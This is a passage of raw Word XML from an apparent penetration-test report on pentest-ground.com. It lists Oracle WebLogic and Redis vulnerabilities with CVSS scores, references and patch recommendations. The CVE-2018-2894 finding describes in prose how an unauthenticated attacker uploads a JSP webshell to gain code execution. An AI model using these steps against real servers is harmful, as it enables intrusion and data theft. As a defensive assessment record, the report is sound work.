        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6E868" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target server is vulnerable to CVE-2018-2894, a Remote Code Execution vulnerability, affecting the Oracle Weblogic server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">This vulnerability is affecting the WLS subcomponent because the path of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>/ws_utc/config.do</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is reachable without authentication, meaning that the Weblogic server is in the development mode. The attacker can set a new Work Home Directory which needs to be writable and then upload JKS Keystores, which are Java Server Pages (JSP) files. Uploading a webshell as a JKS, the attacker can successfully achieve Remote Code Execution on the server. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>We have detected this vulnerability by changing the Work Home Directory to a writable one sending an HTTP POST request, then uploading the webshell as a command interpreter with an HTTP POST request, and finally sending an HTTP GET request to the webshell to read the command response from the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CEBCCB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662D7782" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that a remote unauthenticated attacker can fully compromise the server in order to steal confidential information, install ransomware, or pivot to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794EA62B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949A7B2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend upgrading the Oracle Weblogic to the latest version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B33D0A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C399F9E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId178">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/cve-2018-2894</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79AD5B51" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId179">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.oracle.com/security-alerts/cpujul2018.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A953A6D"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269EFFBA"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19EF0ECA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03170ECA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5373953C" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC539B8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75442CB2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="78834CB3" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14310048" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36E489B2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE-2018-2894</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60226377" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224EB069" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD2805D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09934FEC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.3 Oracle WebLogic Server - Remote Code Execution (CVE-2020-2551) port 7001/tcp</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="64FC5530" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736DC5EE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554F3A50" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="5B7CFCD5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374F3461" wp14:editId="749939F6">
                  <wp:extent cx="1397000" cy="139700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ical_risk.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1397000" cy="1397000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0FD6FFC4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F5CFC29" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D42960C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="2E832C71" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>7001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="794CBC0C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="461EA8CB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E3C21" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect this vulnerability using the following Request / Response chain.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Endpoint: https://pentest-ground.com:7001/console/login/LoginForm.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B95834B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>How to reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DAD51F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableCodeblock"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5AC4FB2E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="232EF04A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>curl -X 'GET' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'Accept: */*' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'Accept-Language: en' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36' 'https://pentest-ground.com:7001/console/login/LoginForm.jsp'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51E50BAC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD97E7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Oracle WebLogic Server (Oracle Fusion Middleware (component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 2.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB971A0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E48F8DD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that a remote unauthenticated attacker can fully compromise the server to steal confidential information, install ransomware, or pivot to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30802C26" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A7CEE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Apply the latest security patches provided by Oracle to mitigate this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3907891C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7123B80F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId180">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/hktalent/CVE-2020-2551</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0258FCD5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId181">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2020-2551</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AE821B7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId182">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.oracle.com/security-alerts/cpujan2020.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26623503" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId183">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/neilzhang1/Chinese-Charts</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2098822B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId184">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/pjgmonteiro/Pentest-tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15C66971"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1216DB26"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77C7C1E7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4566C16A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="29EF8735" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E1F9E7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="253CD621" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE-2020-2551</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6522C036" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0134CE28" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D595A4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DAAEDC" w14:textId="6C3D9BB7" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.4 Vulnerabilities found for Redis Key-Value Store 5.0.7</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2497D6DB" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35732403" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3944C2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="390F8CC3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35519292" wp14:editId="1570BCCA">
                  <wp:extent cx="1397000" cy="139700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38CF01BC" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="701A4401" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AAFE043" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="083B3499" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>6379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="625D8548" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78825652" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="6240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="340ED07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B367D81" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="34797F20"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="160EA3A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760E111" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA70F9C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2FA49C6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AA7DD55" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24E2E62A"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85">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32762</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="529855A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9109EF0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DAE4BA1"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The redis-cli command line tool and redis-sentinel service may be vulnerable to integer overflow when parsing specially crafted large multi-bulk network replies. This is a result of a vulnerability in the underlying hiredis library which does not perform an overflow check before calling the calloc() heap allocation function. This issue only impacts systems with heap allocators that do not perform their own overflow checks. Most modern systems do and are therefore not likely to be affected. Furthermore, by default redis-sentinel uses the jemalloc allocator which is also not vulnerable. The problem is fixed in Redis versions 6.2.6, 6.0.16 and 5.0.14.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5D20D0C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91AAC61" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F53CE5E"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4EF639F5"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0857E26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71A59C6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="28F2DEBE"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="570AC31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E94AEC2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19010432" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="211DB77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2EB036D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CEF3DAC"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86">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2022-24834</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="038171F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C15259B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22507411"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in-memory database that persists on disk. A specially crafted Lua script executing in Redis can trigger a heap overflow in the cjson library, and result with heap corruption and potentially remote code execution. The problem exists in all versions of Redis with Lua scripting support, starting from 2.6, and affects only authenticated and authorized users. The problem is fixed in versions 7.0.12, 6.2.13, and 6.0.20.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6A237C9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FDD6A4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
